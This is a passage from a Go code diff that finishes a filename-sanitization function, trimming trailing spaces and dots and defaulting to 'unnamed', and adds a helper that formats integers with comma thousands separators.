(Windows doesn't allow these) + sanitized = strings.Trim(sanitized, " .") + + // If the name is empty after sanitization, use a default + if sanitized == "" { + sanitized = "unnamed" + } + + return sanitized +} + +// formatNumberWithCommas formats a number with comma separators for readability. +// Example: 1000000 -> "1,000,000" +func formatNumberWithCommas(n int) string { + // Convert to string + s := fmt.Sprintf("%d", n) + + // Handle negative numbers + negative := false + if s[0] == '-' { + negative = true + s = s[1:] + } + + // Add commas every 3 digits from right + var result []rune + for i, digit := range s { + if i > 0 && (len(s)-i)%3 == 0 { + result = append(result, ',') + } + result = append(result, digit) + } + + if negative { + return "-" + string(result) + } + return string(result) +}